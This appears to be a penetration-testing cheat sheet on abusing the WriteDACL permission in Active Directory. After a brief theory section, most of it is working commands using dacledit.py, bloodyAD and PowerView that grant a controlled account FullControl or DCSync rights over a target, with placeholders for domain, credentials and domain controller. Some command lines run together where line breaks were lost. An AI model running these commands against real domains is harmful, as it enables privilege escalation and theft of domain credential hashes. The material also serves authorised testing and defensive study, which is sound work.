PRIMARY CATEGORY → DACL ABUSE
Theory
WriteDACL
This ACL permission can be leveraged to add, delete or modify “any” existing ACE within an object’s ACL, thereby potentially compromising the latter in many ways
Furthermore, we can add the WriteDACL right itself to the target if the account controlled by the attacker has the WriteOwner right over that account
Abuse - UNIX-like
Impacket’s DACLedit.py
Grant FullControl (GenericAll) Right
GenericAll
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights FullControl '<DOMAIN>/<USER>:<PASSWD>'Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights DCSync '<DOMAIN>/<USER>:<PASSWD>'BloodyAD
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
- FullControl (GenericAll) Right
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' add genericAll '<TARGET_ACCOUNT>' '<CONTROLLED_ACCOUNT>'- DCSync Rights
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' add dcsync '<CONTROLLED_ACCOUNT>'Abuse - Windows
Powerview
Grant FullControl Right
GenericAll
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)Add-DomainObjectACL -Credential $cred -Rights 'All' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)Add-DomainObjectACL -Credential $cred -Rights 'DCSync' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'